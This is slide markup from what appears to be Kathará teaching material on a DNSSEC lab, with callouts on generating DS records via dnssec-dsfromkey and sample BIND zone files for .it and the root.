            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2588A69-EE69-0DA9-2832-B0DDE3E69FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA48B8F-2C3A-8DF8-731D-2713D1C4DD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8354182F-3686-E191-80FE-725BB6680FD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5634633" y="1054992"/>
            <a:ext cx="6272177" cy="2122500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41687"/>
              <a:gd name="adj2" fmla="val 126066"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0"/>
              <a:t>Generates the cryptographic "bridge" between .it and uniroma3.it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gets the public key (DNSKEY) from the University.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passes it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec-dsfromkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool, which calculates the hash (fingerprint) and creates the DS (Delegation Signer) record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds this DS record to the "parent" zone file (db.it).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77FFA79-AE17-07B1-1187-60C89F19BF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7849996" y="5626473"/>
            <a:ext cx="3405443" cy="760022"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75067"/>
              <a:gd name="adj2" fmla="val -112075"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0"/>
              <a:t>looks up the serial number of the zone file and increments it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409685842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BFDF19-C2B3-FCB2-E96C-0126D3249B54}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE0AD13-C196-E1A0-C6E1-B06FC9AA13FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1259632"/>
            <a:ext cx="7641005" cy="2442458"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F31A22-49D2-8420-126C-3CDF82E3A9EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsit.it.    root.dnsit.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it. IN  A       110.0.0.10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB4B82B-1CF0-8A62-4BD3-C0F2C2570B12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/db.it</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB253A17-317E-E845-34A8-3D4762376A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EF1C11-0224-B5E8-55AC-EBB8F2CC85AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B02FEF-6ECA-1BBE-BB1D-3B954BB0D4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D53E6DC-A388-4A3A-6172-CE04F8FBE44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2333354" y="4387035"/>
            <a:ext cx="6116028" cy="1143000"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425E44F0-C46A-A6A1-E2F7-DCD883A5E5BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E71984C-7E8F-C5B9-8CA9-F01D77694FC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2936" cy="248"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27276816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D6731E-5580-B7FE-1701-BD2F8B3928DD}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15137E55-A755-070B-F9FB-82B971C8CEF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D27A9-F1DB-00C5-2ECB-D465104C2A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="1810441"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Connettore diritto 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93E2A4B-2FAF-AC8B-6053-94ED9C968D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="1310271"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9327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC61594-ADC1-6692-2644-09A50ACA7AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F1B31F-8B70-24BA-AB7B-BDEAAFE93C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="647488"/>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9298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7FD6D-4DC6-EF8A-B6D0-8DB4537C5701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="2659"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9297" name="Line 149">
            <a:extLst>
